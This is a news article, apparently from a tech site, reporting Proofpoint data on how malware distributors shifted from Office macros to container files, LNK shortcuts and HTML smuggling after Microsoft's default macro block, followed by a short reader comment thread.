As Microsoft blocks Office macros, hackers find new attack vectors


Hackers who normally distributed malware via phishing attachments with malicious macros gradually changed tactics after Microsoft Office began blocking them by default, switching to new file types such as ISO, RAR, and Windows Shortcut (LNK) attachments.

VBA and XL4 Macros are small programs created to automate repetitive tasks in Microsoft Office applications, which threat actors abuse for loading, dropping, or installing malware via malicious Microsoft Office document attachments sent in phishing emails.

The reason for the switch is Microsoft announcing that they would end the massive abuse of the Office subsystem by automatically blocking macros by default and making it harder to activate them.

Although it took Microsoft a little longer to implement this Microsoft Office change, the block finally entered into effect last week.

However, the initial announcement alone convinced malware operators to move away from macros and begin experimenting with alternative methods to infect victims.

Hackers abandon macros

In a new report by Proofpoint, researchers looked at malicious campaign stats between October 2021 and June 2022 and identified a clear shift to other methods of payload distribution, recording a decrease of 66% in the use of macros.

At the same time, the use of container files such as ISOs, ZIPs, and RARs has grown steadily, rising by almost 175%.

Comparison between macros and container filesComparison between macros and container files in campaigns (Proofpoint)

The use of LNK files exploded after February 2022, the time of Microsoft’s announcement, increasing by a whopping 1,675% compared to October 2021, and being the weapon of choice of ten individual threat groups tracked by Proofpoint.

Malicious LNK file use rose to unprecedented levelsMalicious LNK file use rose to unprecedented levels (Proofpoint)

We have reported on the use of LNK files by Emotet, Qbot, and IcedID, in all cases masquerading as a Word document to trick the recipient into opening it.

However, these link files can be used to execute almost any command the user has permission to use, including executing PowerShell scripts that download and execute malware from remote sources.

Windows shortcut running PowerShell command to install EmotetWindows shortcut running PowerShell command to install Emotet
Source: BleepingComputer

Finally, Proofpoint also observed a significant increase in the use of HTML attachments adopting the HTML smuggling technique to drop a malicious file on the host system. However, their distribution volumes continue to remain small.

Shifting the threat

While seeing macros becoming an obsolete method of payload distribution and initial infection is a positive development, the threat has merely shifted rather than being addressed or reduced.

The question that needs answers now is how that change impacts the effectiveness of the malware campaigns, as convincing recipients to open .docx and .xls files was a lot easier than asking them to unpack archives and open files whose names end with .lnk.

Furthermore, to bypass detection by security software, many phishing campaigns now password-protect archive attachments, adding another burdensome step a target must take to access the malicious files.

From that perspective, threat actors relying on phishing emails might be running out of good options, and their infection rates may have dropped as a result.

Finally, email security solutions now have a narrower spectrum of potential risks to evaluate, improving their chances of catching a risky file.


  • BH0 Photo BH0 – 4 days ago

    Malware is distributed when user clicks and runs the macro more then 90% of cases. Its like a law to drive 30mph on a highway, because you COULD crash. This is pure nonsense and the ammount of complications in companies around the world.. Buggy updates, crashing computers, planned obsolence and ever growing HW requirements.

  • scpcguy Photo scpcguy – 4 days ago

    @BH0 that is precisely why Microsoft is right to block Office macros by default, as well as .LNK files being emailed through Office 365. Google does the same. More than 90% of the time users can be trusted to do exactly the wrong thing.

    If an enterprise relies heavily on Office macros there are ways to make accommodations.

  • BH0 Photo BH0 – 3 days ago

    Most of the users clicking the malicious link come from the home users. No need to disable all macroes in the Pro end Ent versions. Just my opinion.

  • Yournicknamehere Photo Yournicknamehere – 2 days ago

    “Most of the users clicking the malicious link come from the home users. No need to disable all macroes in the Pro end Ent versions. Just my opinion.”

    Nope, I track Defender’s alerts and approve remediation of quarantinened emails cached by Defender for Applications, and it seems like most “clicks” malicious URLs happen without user interaction.
    I guess some kind of exploit allowing actors manage to open URLs after delivery still exists.

  • BH0 Photo BH0 – 14 hours ago

    Thank you for sharing your experience. If “clicks” happen without user interaction, will disabbling macroes help to reduce infections, from your angle of view?

  • Malwarebytes Anti-Malware Logo

    Malwarebytes Anti-Malware

    Version: 4.5.12 4M+ Downloads

  • Everything Desktop Search Logo

    Everything Desktop Search

    Version: 21,017 Downloads

  • Zemana AntiLogger Free Logo

    Zemana AntiLogger Free

    Version: 50,816 Downloads

  • Zemana AntiMalware Logo

    Zemana AntiMalware

    Version: NA 302,068 Downloads

  • Windows Repair (All In One) Logo

    Windows Repair (All In One)

    Version: 4.13.0 2M+ Downloads


Related posts

Winter Vivern hackers exploit Zimbra flaw to steal NATO emails

Sarah Henriquez

What the Uber Hack can teach us about navigating IT Security

Sarah Henriquez

Mozilla Firefox gets built-in Firefox Relay controls

Sarah Henriquez

Leave a Comment